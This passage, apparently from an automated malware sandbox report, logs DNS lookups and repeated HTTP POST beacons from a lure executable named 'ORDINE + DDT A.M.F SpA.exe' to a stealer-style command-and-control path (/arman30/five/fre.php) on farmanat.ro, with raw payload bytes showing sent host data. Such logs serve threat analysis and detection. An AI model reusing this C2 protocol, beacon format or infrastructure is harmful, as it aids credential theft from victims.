Nov 25, 2021 10:55:32.672657967 CET	50727	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:32.706537008 CET	80	50727	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:32.723047018 CET	80	50727	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:32.723141909 CET	80	50727	176.223.209.128	192.168.11.20
Nov 25, 2021 10:55:32.723292112 CET	50727	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:32.723306894 CET	50727	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:55:32.757091045 CET	80	50727	176.223.209.128	192.168.11.20

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 25, 2021 10:47:50.042912960 CET	62242	53	192.168.11.20	1.1.1.1
Nov 25, 2021 10:47:51.052072048 CET	62242	53	192.168.11.20	9.9.9.9
Nov 25, 2021 10:47:51.302644014 CET	53	62242	1.1.1.1	192.168.11.20
Nov 25, 2021 10:47:51.432888031 CET	53	62242	9.9.9.9	192.168.11.20
Nov 25, 2021 10:47:53.898544073 CET	61258	53	192.168.11.20	1.1.1.1
Nov 25, 2021 10:47:54.168392897 CET	53	61258	1.1.1.1	192.168.11.20

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Nov 25, 2021 10:47:50.042912960 CET	192.168.11.20	1.1.1.1	0xa8af	Standard query (0)	fabricraft.co.za	A (IP address)	IN (0x0001)
Nov 25, 2021 10:47:51.052072048 CET	192.168.11.20	9.9.9.9	0xa8af	Standard query (0)	fabricraft.co.za	A (IP address)	IN (0x0001)
Nov 25, 2021 10:47:53.898544073 CET	192.168.11.20	1.1.1.1	0x3bd2	Standard query (0)	farmanat.ro	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Nov 25, 2021 10:47:51.302644014 CET	1.1.1.1	192.168.11.20	0xa8af	No error (0)	fabricraft.co.za	197.242.150.64	A (IP address)	IN (0x0001)
Nov 25, 2021 10:47:51.432888031 CET	9.9.9.9	192.168.11.20	0xa8af	No error (0)	fabricraft.co.za	197.242.150.64	A (IP address)	IN (0x0001)
Nov 25, 2021 10:47:54.168392897 CET	1.1.1.1	192.168.11.20	0x3bd2	No error (0)	farmanat.ro	176.223.209.128	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

fabricraft.co.za

farmanat.ro

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.11.20	49816	197.242.150.64	443	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.11.20	49817	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:47:54.204528093 CET	6223	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 178 Connection: close
Nov 25, 2021 10:47:54.238023996 CET	6223	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: 'ckav.ruArthur468325W1064_038k028278665D4ACB73EF64D459A5U5gS
Nov 25, 2021 10:47:54.380963087 CET	6224	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:47:53 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
10	192.168.11.20	49845	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:48:06.992096901 CET	6319	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:48:07.026221991 CET	6319	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:48:07.107255936 CET	6319	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:48:06 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
100	192.168.11.20	49937	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:49:01.916305065 CET	6453	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:49:01.950459003 CET	6453	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:49:02.000180006 CET	6454	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:49:00 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
101	192.168.11.20	49938	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:49:02.470139980 CET	6454	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:49:02.503863096 CET	6455	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:49:02.553404093 CET	6455	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:49:01 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
102	192.168.11.20	49939	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:49:03.002783060 CET	6456	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:49:03.037201881 CET	6456	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:49:03.092166901 CET	6456	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:49:02 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
103	192.168.11.20	49940	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:49:03.489950895 CET	6457	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:49:03.523461103 CET	6457	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:49:03.577493906 CET	6458	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:49:02 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
104	192.168.11.20	49941	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:49:03.973710060 CET	6458	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:49:04.007999897 CET	6459	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:49:04.058206081 CET	6459	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:49:03 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
105	192.168.11.20	49942	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:49:04.469326019 CET	6460	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:49:04.503623009 CET	6460	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:49:04.553472996 CET	6460	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:49:03 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
106	192.168.11.20	49943	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:49:05.006356955 CET	6461	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:49:05.039913893 CET	6461	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:49:05.094136000 CET	6462	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:49:04 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
107	192.168.11.20	49944	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:49:05.526807070 CET	6462	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:49:05.560389996 CET	6463	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:49:05.609328032 CET	6463	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:49:04 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
108	192.168.11.20	49948	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:49:06.029714108 CET	6464	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:49:06.063983917 CET	6465	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:49:06.113828897 CET	6465	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:49:05 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
109	192.168.11.20	49949	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:49:06.509232044 CET	6466	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:49:06.542787075 CET	6466	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:49:06.599896908 CET	6466	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:49:05 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
11	192.168.11.20	49846	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:48:07.734355927 CET	6321	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:48:07.768578053 CET	6321	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:48:07.818254948 CET	6321	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:48:06 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
110	192.168.11.20	49950	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:49:07.028729916 CET	6467	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:49:07.062469006 CET	6467	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:49:07.112368107 CET	6468	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:49:06 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
111	192.168.11.20	49951	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:49:07.550026894 CET	6468	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:49:07.584471941 CET	6469	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:49:07.634911060 CET	6469	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:49:06 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
112	192.168.11.20	49952	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:49:08.046701908 CET	6470	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:49:08.080122948 CET	6470	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:49:08.133228064 CET	6470	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:49:07 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
113	192.168.11.20	49953	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:49:08.502494097 CET	6471	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:49:08.536693096 CET	6471	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:49:08.595326900 CET	6472	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:49:07 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
114	192.168.11.20	49954	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:49:09.053477049 CET	6472	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:49:09.087551117 CET	6473	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:49:09.137372971 CET	6473	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:49:08 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
115	192.168.11.20	49955	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:49:09.583941936 CET	6474	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:49:09.617199898 CET	6474	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
